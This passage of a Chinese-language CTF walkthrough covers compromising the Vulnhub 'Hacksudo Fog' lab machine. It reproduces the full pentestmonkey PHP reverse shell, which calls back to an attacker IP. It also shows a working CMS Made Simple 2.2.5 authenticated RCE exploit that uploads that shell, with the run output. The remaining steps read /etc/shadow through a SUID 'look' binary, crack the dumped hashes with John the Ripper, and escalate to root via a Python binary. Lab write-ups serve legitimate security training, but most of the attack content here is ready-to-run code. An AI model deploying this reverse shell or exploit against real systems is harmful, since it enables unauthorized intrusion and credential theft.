// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.56.146'; // CHANGE THIS
$port = 5555; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
将shell.php(反弹shell)拷贝到exploit_rev.py漏洞利用脚本中,替换原来的system($_GET["_CMD"]$)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ cat exploit_rev.py
# Exploit Title: CMS Made Simple 2.2.5 authenticated Remote Code Execution
# Date: 3rd of July, 2018
# Exploit Author: Mustafa Hasan (@strukt93)
# Vendor Homepage: http://www.cmsmadesimple.org/
# Software Link: http://www.cmsmadesimple.org/downloads/cmsms/
# Version: 2.2.5
# CVE: CVE-2018-1000094
import requests
import base64
base_url = "http://192.168.56.157/cms/admin"
upload_dir = "/uploads"
upload_url = base_url.split('/admin')[0] + upload_dir
username = "fog"
password = "hacksudoISRO"
csrf_param = "_sk_"
txt_filename = 'cmsmsrce.txt'
php_filename = 'shell_rev.php'
payload = "<?php system($_GET['cmd']);?>"
payload = """
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.56.146'; // CHANGE THIS
$port = 5555; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>"""
def parse_csrf_token(location):
print location
return location.split(csrf_param+"=")[1]
def authenticate():
page = "/login.php"
url = base_url + page
data = {
"username": username,
"password": password,
"loginsubmit": "Submit"
}
response = requests.post(url, data=data, allow_redirects=False)
status_code = response.status_code
if status_code == 302:
print "[+] Authenticated successfully with the supplied credentials"
#print response.cookies
print '*'*20
cookies = requests.utils.dict_from_cookiejar(response.cookies)
print cookies
print response.headers['Location']
return cookies, parse_csrf_token(response.headers['Location'])
print "[-] Authentication failed"
return None, None
def upload_txt(cookies, csrf_token):
mact = "FileManager,m1_,upload,0"
page = "/moduleinterface.php"
url = base_url + page
data = {
"mact": mact,
csrf_param: csrf_token,
"disable_buffer": 1
}
txt = {
'm1_files[]': (txt_filename, payload)
}
print "[*] Attempting to upload {}...".format(txt_filename)
response = requests.post(url, data=data, files=txt, cookies=cookies)
#print response.text
status_code = response.status_code
if status_code == 200:
print "[+] Successfully uploaded {}".format(txt_filename)
return True
print "[-] An error occurred while uploading {}".format(txt_filename)
return None
def copy_to_php(cookies, csrf_token):
mact = "FileManager,m1_,fileaction,0"
page = "/moduleinterface.php"
url = base_url + page
b64 = base64.b64encode(txt_filename)
serialized = 'a:1:{{i:0;s:{}:"{}";}}'.format(len(b64), b64)
data = {
"mact": mact,
csrf_param: csrf_token,
"m1_fileactioncopy": "",
"m1_path": upload_dir,
"m1_selall": serialized,
"m1_destdir": "/",
"m1_destname": php_filename,
"m1_submit": "Copy"
}
print "[*] Attempting to copy {} to {}...".format(txt_filename, php_filename)
response = requests.post(url, data=data, cookies=cookies, allow_redirects=False)
print 'check response'
status_code = response.status_code
print response.text
if status_code == 302:
if response.headers['Location'].endswith('copysuccess'):
print "[+] File copied successfully"
return True
print "[-] An error occurred while copying, maybe {} already exists".format(php_filename)
return None
def quit():
print "[-] Exploit failed"
exit()
def run():
cookies,csrf_token = authenticate()
print 'cookies='
print cookies
print 'csrf='
print csrf_token
if not cookies:
quit()
if not upload_txt(cookies, csrf_token):
quit()
if not copy_to_php(cookies, csrf_token):
quit()
print "[+] Exploit succeeded, shell can be found at: {}".format(upload_url + '/' + php_filename)
run()
然后执行脚本exploit_rev.py:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ python2 exploit_rev.py
[+] Authenticated successfully with the supplied credentials
********************
{'_sk_': '797a9b8f5f3ce869334', 'CMSSESSIDb272ee47bbbb': 'k1oqtn9kov5oi3fpphknc6hvsv', '45ba4203b38f2ebed8db32a30c699e4e': '746ff3c7cd79fffb98549c3d3b674e35993020d4%3A%3AYTo1OntzOjM6InVpZCI7aToyO3M6ODoidXNlcm5hbWUiO3M6MzoiZm9nIjtzOjc6ImVmZl91aWQiO047czoxMjoiZWZmX3VzZXJuYW1lIjtOO3M6NToiY2tzdW0iO3M6NDA6IjI0ZTNlMmEzODg4MDU1NGFjMjg4NGIyYjRmOWNjMzc0ODI0OWVjZTAiO30%3D'}
http://192.168.56.157/cms/admin?_sk_=797a9b8f5f3ce869334
http://192.168.56.157/cms/admin?_sk_=797a9b8f5f3ce869334
cookies=
{'_sk_': '797a9b8f5f3ce869334', 'CMSSESSIDb272ee47bbbb': 'k1oqtn9kov5oi3fpphknc6hvsv', '45ba4203b38f2ebed8db32a30c699e4e': '746ff3c7cd79fffb98549c3d3b674e35993020d4%3A%3AYTo1OntzOjM6InVpZCI7aToyO3M6ODoidXNlcm5hbWUiO3M6MzoiZm9nIjtzOjc6ImVmZl91aWQiO047czoxMjoiZWZmX3VzZXJuYW1lIjtOO3M6NToiY2tzdW0iO3M6NDA6IjI0ZTNlMmEzODg4MDU1NGFjMjg4NGIyYjRmOWNjMzc0ODI0OWVjZTAiO30%3D'}
csrf=
797a9b8f5f3ce869334
[*] Attempting to upload cmsmsrce.txt...
[+] Successfully uploaded cmsmsrce.txt
[*] Attempting to copy cmsmsrce.txt to shell_rev.php...
check response
[+] File copied successfully
[+] Exploit succeeded, shell can be found at: http://192.168.56.157/cms/uploads/shell_rev.php
浏览器访问shell_rev.php,从而得到反弹的shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.157] 55688
Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
03:27:03 up 6:44, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@hacksudo:/$ ls
ls
bin ftphome lib lost+found proc srv usr
boot home lib32 media root sys var
dev initrd.img lib64 mnt run tftpboot.prev vmlinuz
etc initrd.img.old libx32 opt sbin tmp vmlinuz.old
www-data@hacksudo:/$
提权
将linpeas.sh脚本上传目标主机/tmp目录,修改权限,并执行该脚本,从脚本输出结果中可以看到第2个flag
www-data@hacksudo:~$ cat flag2.txt
cat flag2.txt
you successfully crack web and got shell access!!!
_ _ _ _
___ ___ _ __ __ _ _ __ __ _| |_ _ _| | __ _| |_(_) ___ _ __
/ __/ _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \
| (_| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | |
\___\___/|_| |_|\__, |_| \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|
step 2 done.
_ ____
___| |_ ___ _ __ |___ \
/ __| __/ _ \ '_ \ __) |
\__ \ || __/ |_) | / __/
|___/\__\___| .__/ |_____|
|_|
www-data@hacksudo:~$
并且linpeas.sh输出结果中告知look命令有SUID位:
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strace Not Found
-rwsr-xr-x 1 root root 427K Jan 31 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 50K Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 113K Jun 24 2020 /usr/sbin/mount.nfs
-rwsr-xr-x 1 root root 83K Jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 35K Jan 10 2019 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 154K Jan 20 2021 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 53K Jul 27 2018 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 11K May 4 2018 /usr/bin/look
-rwsr-xr-x 1 root root 51K Jan 10 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 63K Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
www-data@hacksudo:~$ LFILE=/etc/shadow
LFILE=/etc/shadow
www-data@hacksudo:~$ /usr/bin/look '' "$LFILE"
/usr/bin/look '' "$LFILE"
root:$6$zHA6yDSHPcoPX7dX$2oZJxM7gBzhQIT049d4MuR7jAypyZpDPoo6aKQfkJAfJNKF/CgY1GYFCu.Wb5cB6713Zjtzgk.ls0evZ6YToD/:18756:0:99999:7:::
daemon:*:18751:0:99999:7:::
bin:*:18751:0:99999:7:::
sys:*:18751:0:99999:7:::
sync:*:18751:0:99999:7:::
games:*:18751:0:99999:7:::
man:*:18751:0:99999:7:::
lp:*:18751:0:99999:7:::
mail:*:18751:0:99999:7:::
news:*:18751:0:99999:7:::
uucp:*:18751:0:99999:7:::
proxy:*:18751:0:99999:7:::
www-data:*:18751:0:99999:7:::
backup:*:18751:0:99999:7:::
list:*:18751:0:99999:7:::
irc:*:18751:0:99999:7:::
gnats:*:18751:0:99999:7:::
nobody:*:18751:0:99999:7:::
_apt:*:18751:0:99999:7:::
systemd-timesync:*:18751:0:99999:7:::
systemd-network:*:18751:0:99999:7:::
systemd-resolve:*:18751:0:99999:7:::
systemd-coredump:!!:18751::::::
messagebus:*:18751:0:99999:7:::
sshd:*:18751:0:99999:7:::
mysql:!:18751:0:99999:7:::
_rpc:*:18751:0:99999:7:::
statd:*:18751:0:99999:7:::
tftp:*:18751:0:99999:7:::
ftpuser:!:18751:0:99999:7:::
isro:$6$DMdxcRB0fQbGflz2$39vmRyBB0JubEZpJJN13rSzssMQ6t1R6KXLSPjOmpImsyuWqyXHneT8CH0nKr.XDEzKIjt1H3ndbNzirCjOAa/:18756:0:99999:7:::
dnsmasq:*:18756:0:99999:7:::
利用look命令读取/etc/shadow文件,然后利用unshadow命令合成passwd以及shadow文件
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ vim shadow
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ vim passwd
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ unshadow passwd shadow > encr.txt
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ cat encr.txt
root:$6$zHA6yDSHPcoPX7dX$2oZJxM7gBzhQIT049d4MuR7jAypyZpDPoo6aKQfkJAfJNKF/CgY1GYFCu.Wb5cB6713Zjtzgk.ls0evZ6YToD/:0:0:root:/root:/bin/bash
isro:$6$DMdxcRB0fQbGflz2$39vmRyBB0JubEZpJJN13rSzssMQ6t1R6KXLSPjOmpImsyuWqyXHneT8CH0nKr.XDEzKIjt1H3ndbNzirCjOAa/:1003:1003:,,,:/home/isro:/bin/bash
然后利用john the Ripper工具破解:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt encr.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
qwerty (isro)
很快就破解出isro用户的密码
登录该用户isro
www-data@hacksudo:~$ su - isro
su - isro
Password: qwerty
isro@hacksudo:~$ id
id
uid=1003(isro) gid=1003(isro) groups=1003(isro)
isro@hacksudo:~$ sudo -l
sudo -l
[sudo] password for isro: qwerty
Matching Defaults entries for isro on hacksudo:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User isro may run the following commands on hacksudo:
(root) /usr/bin/ls /home/isro/*
isro@hacksudo:~$
isro@hacksudo:~$ cat user.txt
cat user.txt
8b64d2451b7a8f3fd17390f88ea35917
isro@hacksudo:~/fog$ ls -alh
ls -alh
total 3.7M
drwxr-xr-x 2 isro isro 4.0K May 13 2021 .
drwxr-x--- 5 isro isro 4.0K May 13 2021 ..
-rwxr-xr-x 1 root isro 17K May 12 2021 fog
-rw-r--r-- 1 isro isro 0 May 6 2021 get
-rwxr-xr-x 1 isro isro 68K May 6 2021 ping
-rwxr-xr-x 1 isro isro 3.6M May 6 2021 python
isro@hacksudo:~/fog$ ./fog
./fog
Python 2.7.16 (default, Oct 10 2019, 22:02:15)
[GCC 8.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
import os
>>> os.system("/bin/bash")
os.system("/bin/bash")
root@hacksudo:~/fog# cd /root
cd /root
root@hacksudo:/root# ls -alh
ls -alh
total 44K
drwx------ 5 root root 4.0K May 10 2021 .
drwxr-xr-x 20 root root 4.0K May 9 2021 ..
-rw------- 1 root root 638 May 13 2021 .bash_history
-rw-r--r-- 1 root root 598 May 6 2021 .bashrc
drwxr-xr-x 10 root root 4.0K May 8 2021 fogproject-1.5.9
drwx------ 3 root root 4.0K May 6 2021 .gnupg
drwxr-xr-x 3 root root 4.0K May 4 2021 .local
-rw------- 1 root root 738 May 10 2021 .mysql_history
-rw-r--r-- 1 root root 178 May 4 2021 .profile
-r-------- 1 root 1000 1.5K May 6 2021 root.txt
-rw-r--r-- 1 root root 249 May 10 2021 .wget-hsts
root@hacksudo:/root# cat root.txt
cat root.txt
. .
.n . . n.
. .dP dP 9b 9b. .
4 qXb . dX Xb . dXp t
dX. 9Xb .dXb __ __ dXb. dXP .Xb
9XXb._ _.dXXXXb dXXXXbo. .odXXXXb dXXXXb._ _.dXXP
9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo. .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
`9XXXXXXXXXXXXXXXXXXXXX'~ ~`OOO8b d8OOO'~ ~`XXXXXXXXXXXXXXXXXXXXXP'
`9XXXXXXXXXXXP' `9XX' DIE `98v8P' HUMAN `XXP' `9XXXXXXXXXXXP'
~~~~~~~ 9X. .db|db. .XP ~~~~~~~
)b. .dbo.dP'`v'`9b.od
b. .dX(
,dXXXXXXXXXXXb dXXXXXXXXXXXb.
dXXXXXXXXXXXP' . `9XXXXXXXXXXXb
dXXXXXXXXXXXXb d|b dXXXXXXXXXXXXb
9XXb' `XXXXXb.dX|Xb.dXXXXX' `dXXP
`' 9XXXXXX( )XXXXXXP `'
XXXX X.`v'.X XXXX
XP^X'`b d'`X^XX
X. 9 ` ' P )X
`b ` ' d'
` '
great you rooted hacksudo Fog Box !!!
flag {4356a779ce18252fa1dd2d2b6ab56b19}
submit this flag at hacksudo discord https://discord.gg/vK4NRYt3
root@hacksudo:/root#
成功提权,并拿到root flag
STRIVE FOR PROGRESS,NOT FOR PERFECTION
浙公网安备 33010602011771号